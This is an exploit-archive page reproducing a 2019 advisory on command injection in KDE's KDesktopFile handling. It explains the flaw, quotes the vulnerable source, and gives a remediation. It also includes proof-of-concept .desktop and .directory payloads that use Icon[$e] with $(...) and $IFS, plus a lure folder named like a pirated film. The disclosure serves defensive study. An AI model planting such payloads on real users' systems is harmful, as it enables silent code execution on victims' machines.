what you don't know can hurt you

KDE 4/5 KDesktopFile Command Injection

KDE 4/5 KDesktopFile Command Injection
Posted Aug 5, 2019
Authored by Dominik Penner

KDE 4/5 is vulnerable to a command injection vulnerability in the KDesktopFile class. When a .desktop or .directory file is instantiated, it unsafely evaluates environment variables and shell expansions using KConfigPrivate::expandString() via the KConfigGroup::readEntry() function. Using a specially crafted .desktop file a remote user could be compromised by simply downloading and viewing the file in their file manager, or by drag and dropping a link of it into their documents or desktop. Versions 5.60.0 and below are affected.

tags | exploit, remote, shell
SHA-256 | b976357316212f652d1a32df71b0bd1aeac8e5a5a6fef96198aa227ed6d6f007

KDE 4/5 KDesktopFile Command Injection

Change Mirror Download
                         _       _ 
_______ _ __ ___ | | ___ | |
|_ / _ \ '__/ _ \ | |/ _ \| |
/ / __/ | | (_) || | (_) | |
/___\___|_| \___(_)_|\___/|_|
https://zero.lol
zero days 4 days

Title: KDE 4/5 KDesktopFile Command Injection
Date: July 28th 2019
Author: Dominik Penner / zer0pwn
Vendor Homepage: https://kde.org/
Software Link: https://cgit.kde.org
Version: 5.60.0 and below

Description:
KDE 4/5 is vulnerable to a command injection vulnerability in the KDesktopFile class. When a .desktop or .directory file is instantiated, it unsafely evaluates environment variables and shell expansions using KConfigPrivate::expandString() via the KConfigGroup::readEntry() function. Using a specially crafted .desktop file a remote user could be compromised by simply downloading and viewing the file in their file manager, or by drag and dropping a link of it into their documents or desktop.

The main issue at hand is the fact that the KDE configuration specification is inconsistent with that of XDG (freedesktop). Despite this, KDE mixes its configuration syntax with that of XDG's, allowing for dynamic configuration entries (https://userbase.kde.org/KDE_System_Administration/Configuration_Files#Shell_Expansion).

When we combine this /feature/ with the way KDE handles .desktop and .directory files, we can force the file to evaluate some of the entries within the [Desktop Entry] tag. Some of the entries in this tag include "Icon", "Name", etc. The exploit is dependent on the entry that gets read by the KConfigGroup::readEntry() function. Generally whenever KDE needs to display these entries is when they'll get called. So for example, if we were to browse to the malicious file in our file manager (dolphin), the Icon entry would get called in order to display the icon. Since we know this, we can use a shell command in place of the Icon entry, which in turn will execute our command whenever the file is viewed.

Theoretically, if we can control config entries and trigger their reading, we can achieve command injection / RCE. I imagine there must be more ways to abuse this, however this is the most reliable way I've discovered so far.

Exploit/POCs:

1) payload.desktop

[Desktop Entry]
Icon[$e]=$(echo${IFS}0>~/Desktop/zero.lol&)

2) .directory

[Desktop Entry]
Type=Directory
Icon[$e]=$(echo${IFS}0>~/Desktop/zero.lol&)


Now whenever the files are viewed either in Dolphin, or on the Desktop (or while browsing an SMB share w/ smb4k) your commands will execute. The command processor doesn't seem to like spaces so just use $IFS and you'll be good. For the .desktop payload, it's as simple as having a remote user view the file on their local file system. The .directory payload has another part to it. .directory files are meant for setting configuration entries for the directory itself. Meaning we can set the Icon of the parent directory, and trigger it whenever someone views the folder. This requires nesting directories.

Example:

$ mkdir Hackers.1995.720p.BrRip.x264.YIFY
$ cd Hackers.1995.720p.BrRip.x264.YIFY
$ mkdir YIFY; cd YIFY
$ vi .directory
[Desktop Entry]
Type=Directory
Icon[$e]=$(echo${IFS}0>~/Desktop/zer0.lol&)

Now whenever someone opens the "Hackers.1995.720p.BrRip.x264.YIFY" directory, the YIFY directory will attempt to load the Icon from the .directory file, executing our command(s).

The code:

----------------kdesktopfile.cpp-----------------------------------------------------
182 QString KDesktopFile::readIcon() const
183 {
184 Q_D(const KDesktopFile);
185 return d->desktopGroup.readEntry("Icon", QString()); <---------------------
186 }
-------------------------------------------------------------------------------------

-----------------kconfiggroup.cpp----------------------------------------------------
679 QString KConfigGroup::readEntry(const char *key, const QString &aDefault) const
680 {
681 Q_ASSERT_X(isValid(), "KConfigGroup::readEntry", "accessing an invalid group");
682
683 bool expand = false;
684
685 // read value from the entry map
686 QString aValue = config()->d_func()->lookupData(d->fullName(), key, KEntryMap::SearchLocalized,
687 &expand);
688 if (aValue.isNull()) {
689 aValue = aDefault;
690 }
691
692 if (expand) {
693 return KConfigPrivate::expandString(aValue); <-------------------------
694 }
695
696 return aValue;
697 }
-------------------------------------------------------------------------------------

-----------------kconfig.cpp---------------------------------------------------------
178 QString KConfigPrivate::expandString(const QString &value)
179 {
180 QString aValue = value;
181
182 // check for environment variables and make necessary translations
183 int nDollarPos = aValue.indexOf(QLatin1Char('$'));
184 while (nDollarPos != -1 && nDollarPos + 1 < aValue.length()) {
185 // there is at least one $
186 if (aValue[nDollarPos + 1] == QLatin1Char('(')) {
187 int nEndPos = nDollarPos + 1;
188 // the next character is not $
189 while ((nEndPos <= aValue.length()) && (aValue[nEndPos] != QLatin1Char(')'))) {
190 nEndPos++;
191 }
192 nEndPos++;
193 QString cmd = aValue.mid(nDollarPos + 2, nEndPos - nDollarPos - 3);
194
195 QString result;
196
197 // FIXME: wince does not have pipes
198 #ifndef _WIN32_WCE
199 FILE *fs = popen(QFile::encodeName(cmd).data(), "r"); <-----------
200 if (fs) {
201 QTextStream ts(fs, QIODevice::ReadOnly);
202 result = ts.readAll().trimmed();
203 pclose(fs);
204 }
205 #endif
-------------------------------------------------------------------------------------


Remediation:

Disable shell expansion / dynamic entries for [Desktop Entry] configurations.
Login or Register to add favorites

File Archive:

May 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    0 Files
  • 2
    May 2nd
    15 Files
  • 3
    May 3rd
    19 Files
  • 4
    May 4th
    24 Files
  • 5
    May 5th
    15 Files
  • 6
    May 6th
    14 Files
  • 7
    May 7th
    0 Files
  • 8
    May 8th
    0 Files
  • 9
    May 9th
    13 Files
  • 10
    May 10th
    7 Files
  • 11
    May 11th
    99 Files
  • 12
    May 12th
    45 Files
  • 13
    May 13th
    7 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    16 Files
  • 17
    May 17th
    26 Files
  • 18
    May 18th
    4 Files
  • 19
    May 19th
    17 Files
  • 20
    May 20th
    2 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    6 Files
  • 24
    May 24th
    19 Files
  • 25
    May 25th
    5 Files
  • 26
    May 26th
    12 Files
  • 27
    May 27th
    12 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close